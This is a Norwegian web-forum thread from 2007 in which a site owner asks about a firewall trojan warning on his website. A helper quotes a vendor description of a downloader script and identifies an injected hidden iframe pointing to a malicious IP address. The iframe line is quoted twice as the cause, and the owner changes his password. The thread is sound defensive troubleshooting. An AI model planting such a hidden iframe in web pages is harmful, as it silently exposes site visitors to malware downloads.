Zafar Iqbal Skrevet 8. juni 2007 Del Skrevet 8. juni 2007 Hei. Håper det er noen som kan hjelpe her. Når jeg går inn på¨www.zafariqbal.net får jeg advarsel fra Brannmuren min comodo firewall om at det er opptaget en trojan. Det jeg lurer på er om comodo ikke ser forskjell på javascrip og annet java jeg har på siden og trojan? Håper det er noen som har vært borti lignende før og kan hjelpe meg. Lenke til kommentar
DemoniZer Skrevet 8. juni 2007 Del Skrevet 8. juni 2007 This malicious JavaScript is usually embedded in an HTML page hosted on a certain Web site. This malicious JavaScript accesses the Web site, http://{BLOCKED}.95.149.28/logo/file.php to download a file. It saves the downloaded file in a hardcoded path as C:\sys{random four characters}.EXE. The said file is detected by Trend Micro as TROJ_SMALL.HEA. As a result, routines of the downloaded file may be exhibited on the system. Moreover, it encrypts its code by using the UNESCAPE operator. The said operator is typically used in obfuscating an HTML code. This malicious JavaScript runs on Windows 98, ME, NT, 2000, XP, and Server 2003. Lenke til kommentar
Zafar Iqbal Skrevet 8. juni 2007 Forfatter Del Skrevet 8. juni 2007 This malicious JavaScript is usually embedded in an HTML page hosted on a certain Web site. This malicious JavaScript accesses the Web site, http://{BLOCKED}.95.149.28/logo/file.php to download a file. It saves the downloaded file in a hardcoded path as C:\sys{random four characters}.EXE. The said file is detected by Trend Micro as TROJ_SMALL.HEA. As a result, routines of the downloaded file may be exhibited on the system. Moreover, it encrypts its code by using the UNESCAPE operator. The said operator is typically used in obfuscating an HTML code. This malicious JavaScript runs on Windows 98, ME, NT, 2000, XP, and Server 2003. 8812954[/snapback] Merkelig. Har fjernet endel javascript på siden nå. Nå ligger det kun noen tradedoubler script som ikke skal være farlig. Lenke til kommentar
DemoniZer Skrevet 8. juni 2007 Del Skrevet 8. juni 2007 Problemet ditt ligger her: <body onLoad="MM_preloadImages('Images/arow.gif')"><iframe src='http://81.95.149.28/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe> Mest sannsynlig har noen kommet seg inn på webserveren og lagt dette til. Kanskje skifte fra 644 til 444? Lenke til kommentar
Zafar Iqbal Skrevet 8. juni 2007 Forfatter Del Skrevet 8. juni 2007 Problemet ditt ligger her: <body onLoad="MM_preloadImages('Images/arow.gif')"><iframe src='http://81.95.149.28/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe> Mest sannsynlig har noen kommet seg inn på webserveren og lagt dette til. Kanskje skifte fra 644 til 444? 8813390[/snapback] Utrolig rart. index filen står med 644. men coden du refererte til ovenfor har ikke jeg lagt til. Endret passordet til websiden min nå da. Så får håpe det løser problemet. Tusen takk for hjelpen Lenke til kommentar
DemoniZer Skrevet 9. juni 2007 Del Skrevet 9. juni 2007 Det hjelper nok det skal du se Dette problemet har blitt ganske utbredt de siste 3 dagene.. 500+ maskiner infisert.. Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå